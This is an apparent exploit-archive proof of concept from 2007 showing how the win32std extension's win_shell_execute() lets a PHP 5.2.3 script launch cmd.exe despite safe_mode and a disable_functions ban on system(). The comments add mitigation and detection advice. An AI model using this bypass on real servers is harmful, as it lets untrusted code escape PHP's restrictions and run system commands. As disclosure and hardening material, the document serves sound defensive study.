
# Title : PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass
# Published : 2007-07-24
# Author : shinnai


<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on XP Pro SP2, fully patched; worked both from the CLI and on Apache

//Thanks to rgod for all his precious advice :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be executed
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

//What the script shows: it makes the same process launch twice, first through
//the PHP core function system() and then through win_shell_execute() from the
//win32std extension. The author reports that only the first call is stopped
//by the php.ini settings above.
//
//Why it matters for hardening: disable_functions is a list of function names,
//so a function exported by a loaded extension stays callable unless it is
//listed too. safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4, so it
//should not be treated as a security boundary.
//
//Mitigation: do not load win32std (or any process-spawning extension) where
//untrusted scripts run, add its functions to disable_functions if it must be
//loaded, and restrict the PHP/web-server account at the OS level.
//
//Detection: as the author notes, a cmd.exe process appears when the page is
//served by Apache; an unexpected cmd.exe started by the web server or PHP
//process is the signal to alert on.

//Precondition: the script stops here unless the win32std extension is loaded.
if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //control check: with the php.ini above this call is expected to be refused
//Same executable, requested through the extension's API and a relative path
//instead of the blocked core function.
win_shell_execute("..\..\..\..\windows\system32\cmd.exe");
?>
